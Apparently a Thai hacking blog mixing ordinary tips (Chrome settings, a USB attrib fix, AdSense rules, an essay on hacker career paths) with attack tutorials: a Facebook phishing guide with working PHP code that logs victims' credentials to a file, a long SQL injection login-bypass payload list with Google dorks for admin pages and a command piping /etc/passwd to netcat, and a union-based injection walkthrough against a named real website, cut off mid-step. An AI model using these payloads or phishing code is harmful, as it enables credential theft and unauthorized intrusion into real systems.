แชร์ Link แล้วได้เงิน

วันพฤหัสบดีที่ 25 กุมภาพันธ์ พ.ศ. 2559

วิธีตั้งค่า chrome บนพีซี ให้หยุดทำงานเบื้องหลังเมื่อปิดโปรแกรม

เวลาท่องเว็บไซต์ผ่านทาง Chrome บนพีซี Windows ซึ่งจะเห็นไอคอน Chrome บริเวณขวาล่างใกล้ๆกับพวกไอคอนลำโพงหรือ นาฬิกา ซึ่งก็ทราบกันดีว่า Chrome ทำงานเบื้องหลังตลอดตั้งแต่ตอนเปิดเครื่อง แต่หากคุณใช้ Notebook ก็จะใช้พลังงานแบตเยอะด้วย หรือไม่ก็กระทบกับการทำงานของโปรแกรมอื่นบางโปรแกรม เพราะ Chrome ก็ใช้ทรัพยากรในการทำงานบนเครื่องในการรันส่วนเสริมต่างๆที่คุณติดตั้งเพิ่ม บทความนี้เลยมาดูวิธีตั้งค่าให้เมื่อปิด Chrome แล้วต้องปิดสนิทแบบไม่รันเป็นโปรแกรมเบื้องหลัง
stop-google-chrome-running-background-aa
ขณะเปิด Chrome บนพีซีอยู่ พบไอคอน Chrome ด้านมุมขวาล่างแบบนี้ ให้คลิกขวาที่ไอคอน Chrome แล้วติ๊กเอาเครื่องหมายถูกออกที่ Let Google Chrome run in the background แค่นี้ก็เรียบร้อย  
stop-google-chrome-running-background-a01
แต่ก็ยังไม่สมบูรณ์สนิทนักเพราะหาก shutdown หรือ restart เครื่องใหม่ ก็กลับมาเหมือนเดิมอยู่ เลยคราวนี้มาตั้งค่าผ่านทาง settings ของ Chrome บนพีซี Windows กัน โดยเปิดโปรแกรม Chrome แล้วคลิกที่ ไอคอน 3 ขีด ซึ่งอยู่มุมขวาบนของ Chrome แล้วเลือกที่ Settings
stop-google-chrome-running-background-00
จากนั้นเลื่อนลงมาด้านล่างสุด แล้วคลิกที่ Show advanced settings…
stop-google-chrome-running-background-01
แล้วเอาเครื่องหมายถูกออกที่ Continue running background apps when Google Chrome is closed  ดังรูป แค่นี้ก็ปิดการทำงานเบื้องหลังของ Chrome เรียบร้อยแล้ว ซึ่งจะทำให้ลดการใช้พลังงานแบต และเพิ่มความเร็วในการรันโปรแกรมอื่นๆด้วย

ขอขอบคุณบทความดีๆ จาก IT24Hrs

วันอังคารที่ 23 กุมภาพันธ์ พ.ศ. 2559

สอน Hack อีเมล์ & password Facebook โดยวิธีทำ phishing


ดูคลิป ประกอบการสอน






ขั้นตอนมี ดังนี้
1 เข้า www.facebook.com แล้วกด ดู "รหัสต้นฉบับ"
2 Copy โค๊ดไปวางใน Notepad

ค้นหาคำว่า "action" โดยไปที่หน้าโค๊ด แล้วกดปุ่ม F3

ถ้าหาคำว่า POST ไม่เจอให้เปลี่ยนเป็น method ใช้ตัวเปิด Text

ตัวใหม่ เช่น Notepad++

ตรง action="" ให้เปลี่ยนเป็น post.php

เสร็จแล้ว อัพไฟล์ไปไว้ใน Hosting ซึ่งในที่นี้ ผมจะใช้ เป็น Localhost แทน

ตั้งชื่อว่า index.php

เข้า Google แล้วหา คำว่า post.php

สร้างไฟล์ขึ้นมา ชื่อว่า post.php แล้วเอาไปไว้ใน ที่อยู่เดียวกันกับ
post.php

header ('Location:https://www.facebook.com/home.php');
$handle = fopen("pass/user.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;?>

หน้าตาเหมือน Facebook เปี๊ย แต่ไม่ใช้ Facebook มันคือเว็บดักรหัส
Facebook ดีๆ นี้เอง เรามาลอง ทดสอบกันว่าใช้ได้
ผลไหม ? โดยผมจะ Log In ให้ดู รหัสคือ 1234 มาดู Log กันนะครับ

โทษทีนะครับ ผมลืมปิด Anti ไวรัส ต้องปิดก่อน

มาดูกันครับ

ติดตาม Blog ด้วยนะครับ : http://icthack.blogspot.com
เฟสบุ๊คผม : https://www.facebook.com/StartDock



วิธีแก้ไข ไวรัสซ่อนไฟล์ Handy Drive สำหรับท่านที่ยังไม่รู้นะครับ

แต่ละท่านในนี้อาจจะเจอบ่อย และแก้ไขบ่อยนะครับ  
สำหรับท่านที่ยังไม่รู้  หากท่านพบว่า Handy Drive
Scan ดูแล้วติดไวรัส  เมื่อ Delete หรือ Remove Virus ออกแล้ว
เมื่อเสียบ Handy Drive จะมองไม่เห็นข้อมูล
โดยจะมองเห็นเป็น Short cut และชื่อ Handy Drive แทน

วิธีแก้เพื่อให้เห็นข้อมูลก็ไม่ยากครับ
โดยการคลิก เข้าไปที่ Start -—> Run —–> แล้วพิมพ์คำว่า cmd แล้วกด Enter

อีกวิธีหนึ่งก็

เข้าไปที่ Start -—> Programs —–> Acessories ——> Command Prompt

จากนั้นพิมพ์ ชื่อตัวเลข Drive ที่ Handy Drive เราอยู่
เช่น อยู่ที่ Drive G  ก็พิมพ์คำว่า  G:  แล้ว Enter

เมื่อเราอยู่ที่ Drive ของ Handy Drive แล้ว
จากนั้นจัดการพิมพ์ข้อความตามนี้ เว้นวรรคด้วยนะครับ

attrib *.* -s -h -a -r /d /s   (ตามภาพครับ)



แล้วกด Enter  จะมีการเขียน/อ่าน ที่ Handy Drive ครู่นึง
เมื่อคลิกเข้าไปดูจะพบข้อมูลของเรา  
แล้วเราก็ลบไฟล์ขยะเศษซากจากไวรัสได้นะครับ

วันเสาร์ที่ 20 กุมภาพันธ์ พ.ศ. 2559

5 กฎเหล็กในการ หาเงินจาก Google Adsense ถ้าไม่ทำตามโดนแบนแน่นอน



หลังจากที่เราสามารถทำการ สร้างเว็บไซต์ ได้สำเร็จแล้ว ต่อไปก็ถึงเวลา ที่เราต้องคิดที่จะหารายได้ จาก เว็บไซต์ ของเรากันล่ะครับ ว่าจะใช้มัน สร้างรายได้ให้กับเราด้วยวิธีไหนดี มีทั้ง Affiliate หรือเป็นนายหน้าขายของก็ได้ แต่ถ้าไม่ชอบ ก็มีอีกวิธี ก็คือ ติดโฆษณา บนเว็บไซต์ ซะเลย ง่ายและได้เงินเร็วอีกด้วย นั่นก็คือ Google Adsense นั่นเอง แต่สำหรับผู้ที่กำลังจะสร้างรายได้แบบ Passive income ด้วยการ หาเงินจาก Google Adsense นั้น มีสิ่งหนึ่งที่ต้องรู้เอาไว้ ตั้งแต่ก่อนที่จะทำการ สมัคร Google Adsense เลยก็คือ กฎระเบียบ และข้อห้ามต่างๆ ที่ทางกูเกิ้ลได้กำหนดเอาไว้ ระเบียบต่างๆ เหล่านี้ ได้ถูกนำมาใช้อย่างเข้มข้นมากๆ อย่าคิดว่า ทางกูเกิ้ลเค้าจะตรวจไม่พบ หรือตรวจไม่ละเอียด ผมบอกได้เลยว่า บางคนอาจจะฟลุ้ค สมัคร Adsense ผ่าน แต่สุดท้ายก็ต้องมาโดนแบนบัญชี เพราะทำผิดกฎที่ทาง Adsense ตั้งเอาไว้ เมื่อโดนแบนแล้ว โอกาสที่จะอุทธรณ์ ร้องขอบัญชีคืน เป็นไปได้ยากมากๆ จนแทบจะเป็นไปไม่ได้เลย ทางที่ดีที่สุด ก็คือ เรียนรู้กฎระเบียบ ข้อบังคับเหล่านี้เอาไว้ดีกว่า


กฎเหล็ก 5 ข้อ ในการ หาเงินจาก Google Adsense



1. อย่าเพิ่มจำนวนการคลิกด้วยวิธีโกงในรูปแบบต่างๆ อันนี้เกิดขึ้นบ่อยมากๆ เพราะหลายคนที่เพิ่งเริ่มทำใหม่ๆ ก็โลภ อยากที่จะมีรายได้เยอะๆ และส่วนใหญ่ที่พลาด ก็คือ ไม่ได้อ่านกฎเหล็กเหล่านี้ ที่ทาง Adsense ส่งมาให้ (เป็นภาษาอังกฤษ) อย่าคิดว่า ถ้าคุณแอบไปเปิดคอมเครื่องอื่น แล้วคลิก ทางกูเกิ้ลจะตรวจสอบไม่เจอ พวกที่ชอบลองของ โดนแบนมากันเยอะแล้วครับ นอกจากนี้ นอกจากโกงจำนวนคลิกด้วยการคลิกเองในคอมเครื่องอื่นๆ แล้ว ยังมีกติกาอื่นๆ ที่ถูกห้าม รวมอยู่ได้ข้อนี้ด้วย ได้แก่

ห้ามคลิกที่โฆษณาในหน้าเว็บของตัวเอง อันนี้ชัดเจน ห้ามเด็ดขาด ไม่งั้นโดนแบนทันที และโดนแบนง่ายมากๆ ดังนั้นอย่าพลาดกดเข้าไปโดนที่โฆษณาของตัวเองเด็ดขาด ทางที่ดี ถ้าไม่จำเป็น อย่าเปิดเว็บตัวเองดูเลยจะดีที่สุด
ห้ามขอให้คนอื่นช่วยคลิกที่โฆษณาให้ อันนี้ก็เหมือนกัน อย่าคิดว่า การที่เราขอให้เพื่อน ที่อยู่คนละบ้าน ช่วยเปิดเว็บของเรา แล้วคลิกที่โฆษณาให้ จะตบตากูเกิ้ลได้โดนกันมาเยอะแล้วครับ
ห้ามใช้โปรแกรมอัตโนมัติต่างๆ เข้ามาช่วยในการโกง เช่น โปรแกรม Auto Mouse อันนี้ก็เหมือนกัน อย่าคิดว่า จะหลอกกูเกิ้ลได้ ด้วยการใช้ script หรือ โปรแกรมปั๊มคลิก หรือปั๊ม traffic เป็นอันขาด ถ้าไม่อยากจะโดนแบน
ห้ามเข้าร่วมกับกลุ่มที่ช่วยกันแลกกันคลิกที่โฆษณา เนื่องจากในปัจจุบันนี้ มีการรวมกลุ่มกันในโลกโซเชียล เพื่อช่วยกันแลกเว็บ แล้วคลิกโฆษณาให้กันและกัน โดนแบนกันมาเยอะแล้วครับ ไอ้พวกนี้ และอย่าไปเข้ากลุ่มพวกนี้เด็ดขาดนะครับ เดี๋ยวจะโดนหางเลขไปด้วย การท่องไปเว็บนั้น เว็บนี้ มันมีเส้นทางให้ตรวจสอบได้นะครับ กูเกิ้ลเค้าตรวจสอบได้หมดแหละ
2. อย่าแสดงจำนวนโฆษณามากกว่าที่ทาง Adsense กำหนดเอาไว้ อันนี้ที่โดนแบนส่วนใหญ่ ก็เกิดจากความโลภ และไม่ได้ศึกษากฎระเบียบข้อบังคับของทางกูเกิ้ลโดยละเอียดว่า ในแต่ละหน้า จะสามารถติดโฆษณาได้กี่อัน ส่วนใหญ่อยากได้เงินมากๆ ก็ติดมันเต็มไปหมด เกินจำนวน ก็โดนแบนอัตโนมัติเลยครับ

3. อย่าใส่โฆษณาไปบนหน้าที่ไม่มีเนื้อหาใดๆ อยู่เลย เราอาจจะเจอหน้าเว็บ ที่เปิดมาแล้ว มีแต่โฆษณาของกูเกิ้ลเต็มไปหมดกันมาหลายเว็บแล้ว ทั้งในต่างประเทศ และในไทยเราเอง ก็มีเหมือนกัน

4. อย่าสร้างบัญชี Google Adsense มากกว่า 1 บัญชี

5. อย่าทำให้คนที่เข้ามาดู เว็บไซต์ คิดว่าโฆษณา Adsense ไม่ใช่โฆษณา

ทุกคนล้วนมีความโลภ แต่ในเรื่องของการ สร้างรายได้ออนไลน์ นั้น จำเอาไว้เสมอว่า อย่าโลภ เพราะไม่มีอะไร ที่ได้มาง่ายๆ โดยที่ไม่ต้องพยายาม ความสำเร็จที่คุณเห็นว่าใครต่อใคร เค้าประสบความสำเร็จ หารายได้ออนไลน์ ได้มากมายนั้น ก็เพราะว่าเขาพยายามกันมาอย่างหนัก กว่าจะมาถึงจุดนั้น ต้องลำบากขนาดไหน ผมอยากให้มองว่าการ หาเงินจาก Google Adsense ก็เหมือนกับการปลูกต้นยางพารา มันต้องใช้เวลาเริ่มต้นนานหน่อย กว่าจะมีน้ำยางให้กรีด อย่างน้อยๆ ก็ 5 – 7 ปีขึ้นไป ถึงจะเริ่มกรีดได้ เช่นเดียวกัน Adsense ก็ควรจะเริ่มเก็บเกี่ยวรายได้ได้ ตั้งแต่เดือนที่ 6 เป็นต้นไป ถ้าคุณเริ่มต้นดี สะสมทุนมาดี ต่อไปคุณก็รอรับรายได้เพียงอย่างเดียว แต่ถ้าเริ่มต้นขี้เกียจ คุณก็จะไม่ประสบความสำเร็จแน่นอนครับ





วันเสาร์ที่ 6 กุมภาพันธ์ พ.ศ. 2559

อธิบายเกี่ยวกับ HACKER - แฮกเกอร์






สอนแฮกเกอร์ = สอนให้รู้จักการแฮก ที่แท้จริงของแฮกเกอร์ 
และประยุกค์นำไปใช้ในทางที่ดี ดีกว่าอ่อน SECURITY จนโดนเขาแฮก
เว็บนี้เกิดจากการใช้แนวคิดในแง่มุมตอนที่ผมเริ่มหัดเรียนรู้ในด้านนี้ใหม่ๆ (แฮกเกอร์) เป็นการเรียนรู้ด้วยตัวเอง และเดินไปในทางที่ผิดพลาด
(ผมเสียเวลากับการเรียนรู้ที่ผิดพลาดมานานกว่า 5 ปี)
ค้นหาแต่เพียงเครื่องมือที่นำมาซึ่งความสบาย
แต่ภายในเราไม่รู้อะไรเกี่ยวกับมันอย่างลึกซึ้งเลย
จากคนที่มีความคิดในทางลบ จึงอยากดึงคนที่สนใจ แฮกเกอร์เหล่านี้
เพื่อปรับเปลี่ยนแนวคิด ในคำว่า แฮก
ของคนกลุ่มนี้ให้ไปทางที่เกิดประโยชน์ต่อไป
การสนใจ "แฮกเกอร์" ไม่ผิด
แต่บางครั้งการศึกษาแบบไม่มีผู้แนะนำนั้น
ทำให้ผู้เริ่มต้นใหม่ๆอาจสนใจผิดในสิ่งที่ผิดได้
เช่นการเปิด Google : ค้นหา โปรแกรมแฮกเฟสบุ๊ค , โปรแกรมแฮก...ลฯล
ถือเป็นการเสียเวลา,ไม่ได้ความรู้ แถมอาจได้ไวรัส ,ถูกขโมยข้อมูลได้แบบไม่รู้ตัว
แล้วจะเป็น "แฮกเกอร์" ควรจะอ่านเรื่องอะไร
ถ้าผมเจอคำถามนี้ ผมมักจะตอบกลับไปว่า...
คุณมีอะไรอยู่ในมือ ?
กับ ทำอะไรแล้วมีความสุข ?
ความรู้ประเภทไหนที่มันเข้าหัวได้เรื่อยๆ โดยที่คุณไม่รู้สึกรำคาญ
นั่นแหละครับคือสิ่งที่คุณต้องพยายาม ทำมันให้เต็มที่
เพราะในที่สุดแล้วต่อให้คุณพยามเรียนรู้
โดยตั้งเป้าไว้ที่คำว่า HACK เพียงคำเดียว
คำตอบนั้นกว้างมาก..ผลลัพธ์ที่ออกมาก็คือความท้อแท้
จนทำให้คุณรู้สึกเบื่อ จนเลิกที่จะเรียนรู้ไปเลยก็ได้
คำถามข้างบนนี้ จะให้คำตอบได้ว่า
คุณควรจะเป็น หรือ จะเป็นอะไรได้บ้าง ?
ตอบคำถามตัวเองแล้วเริ่มศึกษากับสิ่งนั้นอย่างจริงจัง...
สิ่งที่ควรสนใจในเส้นทางของ แฮกเกอร์ นั้น
หลักๆจะมี 4 สายวิชาให้เลือกศึกษาคือ
[1] Programing
สายนี้ สำหรับคนชอบการเขียนโปรแกรม เพื่อใช้งานกับคอมพ์พิวเตอร์
หรืออาจจะรวมไปถึงการเขียน Mobile Application เพื่อใช้งานบนมือถือด้วย ลฯล
ซึ่งแฮกเกอร์ส่วนมากก็ต้องศึกษาโค้ดกันด้วย....เพื่อเข้าใจกับการทำงานของโปรแกรม
ยกตัวอย่าง การที่จะแฮกเว็บ ซักเว็บหนึ่ง ก็ต้องเรียนรู้ภาษาของเว็บ
และเรียนรู้การใช้งานของระบบจัดการฐานข้อมูลของเว็บๆนั้นด้วย ลฯล
หรืออีกด้านคือการเขียนเพื่อใช้งานเอง ซึ่งสายนี้ก็มักจะเรียนรู้คู่กับการ Reverse Engineering
[2] Reverse Engineering
สำหรับคนที่ชอบโปรแกรมเมอร์ก็สามารถเรียนรู้ในเรื่อง Reverse Engineering ได้
เพราะกลุ่มนี้จะยุ่งอยู่กับโค้ดเหมือนๆกัน เช่น ทำการ Crack โปรแกรมแก้ไขไฟล์ของโปรแกรมนั้นๆให้สามารถใช้งานได้โดยไม่จำกัดเวลา
หรือ เปิดฟังชั่น ของโปรแกรมฟรี หรือจะเป็นการทำ Decompiler
เพื่อดู Source Code ของโปรแกรม ลฯล
[3] Forensics
สำหรับคนที่ชอบแนว นักสืบ ที่จะทำเกี่ยวกับ
การตรวจสอบ การเก็บหลักฐาน, การค้นหา, วิเคราะห์
และการนำเสนอหลักฐานทางดิจิตอล เช่น การตามจับ HACKER
[4] Pentester
คือกลุ่มแฮกเกอร์ที่ทำการทดสอบเจาะระบบต่างๆ
แยกออกหลักๆ 3 ประเภทดังนี้
Web Application Penetration Testing
การทดสอบความปลอดภัยของเว็บไซต์ หรือพูดง่ายๆคือการ ทดสอบแฮกเว็บ
แฮกเกอร์กลุ่มนี้อย่างน้อยๆจะต้องมีความรู้ในเรื่องภาษาที่ใช้เขียนเว็บไซต์
และการใช้งานระบบจัดการฐานข้อมูล คำสั่งในด้าน Os Command
ของเว็บไซต์ ที่ทำการทดสอบ ลฯล ภาษาที่แนะนำเพื่อเริ่มต้นคือ PHP & Mysql
และทำการ Vulnerability Assessment เพื่อประเมิณความอันตรายของช่องโหว่นั้นๆ
Client-Side Penetration Testing
คือกลุ่มแฮกเกอร์ ที่ชอบทดสอบแฮก USER หรือแฮกผู้ใช้คอมพ์ทั่วไป
โดยอาศัย ช่องโหว่ของ Software,Web browsers, Media players ลฯล
Network Penetration Testing
เป็นการโจมตีที่กว้างมาก (อธิบายไม่หมด)
เริ่มตั้งแต่การทดสอบจากเครือข่ายภายใน LAN , WLAN , MAN , WAN
แนะนำให้ศึกษา OSI 7 Layer และ TCP/IP สำหรับการเริ่มต้น
อธิบายคำว่า "Security"
ตีความหมายออกมาให้เห็นภาพ ?
HACK = HACK
(ไม่ต้องรู้อะไรมาก รู้แค่วิธีการแฮกแค่นั้น)
SECURITY
เน้นการเรียนรู้หลักการทำงานของช่องโหว่
HACK ได้ (แค่บางคน)
ในทางปฏิบัติคำตอบก็คือการ "PENTEST"
เพื่อป้องกันระบบของตนเองให้รอดพ้นจากแฮกเกอร์
รวมถึงสามารถป้องกันได้ (อย่างถูกวิธี)
สุดท้ายการเป็น JubChai แปลเป็นไทยคือ "จับฉ่าย"
อาจจะไม่ใช่กลุ่มจำพวกคนที่มั่วซั่ว แต่อาจจะหมายถึงคนที่ศึกษามันซะทุกอย่าง
จนสามารถไปต่อได้ในทุกๆด้าน และการนำความรู้เหล่านี้มาปรับใช้เข้าด้วยกันได้
(แต่ก็มีทางลึกของตัวเองอยู่เพียงหนึ่ง) คือที่มาของคำว่า "แฮกเกอร์"
ฝากถึง "แฮกเกอร์" หรือเด็กมหาลัยชาว it ทุกคนที่สนใจ
ความพยามในการเรียนรู้สำคัญมาก
เชื่อว่าหลายๆคนอ่านมาถึงจุดนี้แล้วเพราะความสนใจจริง
แต่ในทางปฏิบัติ ผมขอตั้งคำถามไว้ว่า
ถ้าคุณเปิดเจอเนื้อหาที่อ่านแล้วไม่เข้าใจ
คุณจะยอมเสียเวลานั่งเซิส Google กันมั้ยครับ ?
ถ้ายอม = การเรียนรู้ก็ไปต่อ = บทความนี้เป็นผลสำเร็จ
ถ้าไม่....การเรียนรู้ก็จบลงแค่นั้น...
ความฝันอยากเป็น "Hacker" ก็ยังเลือนลางต่อไป
นอกซะจากการขอคำแนะนำจากผู้รู้ที่รู้จัก หรือใช้การเรียนรู้ที่เร็วคือการถาม
แต่ในวงการ HACK ถ้าไม่สนิทจริงคงไม่มีใครสอนกันง่ายๆแน่นอน
ท้ายสุด.....การเรียนรู้ด้วยตัวเอง (แสวงหา)
ฝึกเป็นนักแปล การฝึกแปล สำคัญมาก
ถึงแม้เด็กๆรุ่นหลังมีมากที่ไม่ชอบการเรียนรู้ภาษา
แต่เหตุผลที่ต้องแปลเพราะบทความในไทย
อาจไม่มีไอเดียร์ที่ดี ให้อ่านกันมากเท่าไหร่
เปิดเจอบทความ ภาษาอังกฤษ ที่น่าสนใจให้ลุยได้เลยครับ
เพราะชีวิตคือการเรียนรู้ เราจึงต้องแสวงหา และเรียนรู้กันต่อไป

{SQLi}- คำสั่ง Bypass หน้าล็อกอิน Admin






SQL Injection
คำสั่ง Bypass หน้าล็อกอิน Admin

SQL Injection
คำสั่ง Bypass หน้าล็อกอิน Admin

ดูวิดีโอ: http://www.youtube.com/watch?v=FDGjG8elyKw

1. หาเว็ปไซด์เป้าหมาย
ใช้ Dorks ในการหาหน้า Admin ของเว็ปไซด์ต่างๆครับ. ไปที่ google.com แล้วใช้สั่ง Dorks พวกนี้.
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
2. หลังจากที่เรามีเว็ปเป้าหมายแล้ว ในหน้า Admin ของเว็ปไซด์นั้นคือที่ที่เราจะใช้คำสั่ง Bypass ในการเจาะเข้าฐานข้อมูล เช่น:
Code:
Username: admin
Password: ' or 0=0 --
นี้คือลิสคำสั่ง Bypass login ทั้หมดครับ
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
รหัสผ่านที่เป็นไปได้มากที่สุด
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
ถ้าเว็ปไซด์เป้าหมายเป็นเวอร์ชั่น 5 ขึ้นไป, คำสั่งพวกนี้ก็ใช้ได้เช่นกัน: UNION,group, @@version,orderby,benchmark etc can be executed
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'

[Hack XSS,SQL injection] สอนทำ XSS ในช่องโหว่ SQL injection

วิธีทำ

1 หาเว็บไซต์เป้าหมายที่มี ช่องโหว่ SQL Injection
ผมจะใช้เว็บนี้น่ะ

http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+

2 ตรวจสอบเว็บไซต์ดังกล่าว ว่ามีช่องโหว่ SQL จริงหรือไม่โดยการเติม ' ต่อท้ายลิงค์ ถ้าขึ้น Warning: mysql_num_rows() แสดงว่ามี

3 หาคอลัมน์ โดยใช้ คำสั่ง order+by+1 ต่อไปเรื่อยๆ จน เจอ Error

http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+1-- ไม่เจอ Error
http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+2-- ไม่เจอ Error
http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+3-- ไม่เจอ Error
http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+4-- ไม่เจอ Error
http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+5-- ไม่เจอ Error
http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+6-- ไม่เจอ Error
http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+7-- ไม่เจอ Error
http://www.mrt.itd.co.th/newsdetail.php?id=27+order+by+8-- เจอ Error

นั้นหมายความว่าในฐานข้อมูลเว็ปนี้มีแค่ 7 คอลัมน์

จากนั้นเราจะต้องหาว่าใน 7 คอลัมน์นั้นมีคอลัมน์ไหนที่มีช่องโหว่ให้เราสามารถเจาะเข้าไปได้โดยใช้คำสั่ง (union+select).
หน้าตาลิงค์จะเป็นแบบนี้

http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,2,3,4,5,6,7--
อย่าลืมอักษร - ก่อนหน้าเลข 2 นะครับดูให้ดีๆ
หลังจากรีโหลดหน้าเว็ป คุณจะเห็นตัวเลขโชว์ขึ้นมาหน้าเว็ป. นั้นคือคอลัมน์ที่มีช่องโหว่. ตัวอย่างเช่นเว็ปไซต์ด้านบนมีคอลัมน์ 2 กับ 5 ที่มีช่องโหว่.

4: หาเวอร์ชั่นของ SQL

ต่อไปใช้คำสั่ง (@@version) ในการหาเวอร์ชั้นของเว็ปไซต์. โดยการแทนที่คอลัมน์ที่มีช่องโหว่ด้วยคำสั่ง เช่น:
Code:
http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,@@version,3,4,5,6,7--
ตามลิงค์ด้านบนผมใส่คำสั่งแทนที่คอลัมน์ 3. จากนั้นรีโหลดหน้าเว็ป... คุณก็ได้เวอร์ชั่นของเว็ปไซต์นี้ >> 5.1.68-community

ถ้าคำสั่งด้านบนผิดพลาดโดยที่หน้าเว็ปไม่โชว์เวอร์ชั่นหรือมี Error ให้เราใช้คำสั่งนี้แทน
convert(@@version using latin1)
ดังนั้นลิงค์จะมีหน้าตาเป็นแบบนี้
Code:
http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,convert(@@version using latin1),3,4,5,6,7--

หรือคำสั่งนี้: unhex(hex(@@version))
Code:
http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,unhex(hex(@@version)),3,4,5,6,7--

ให้ลบ เลข คอลัมน์ ที่มีช่องโหว่ออกไป แล้วเติม 0x เข้าไปแทน ก็จะได้
http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,0x,3,4,5,6,7--

จากนั้นไปที่นี่ http://www.string-functions.com/string-hex.aspx

แล้ว เอา สคริปต์นี้ ไป แปลง 

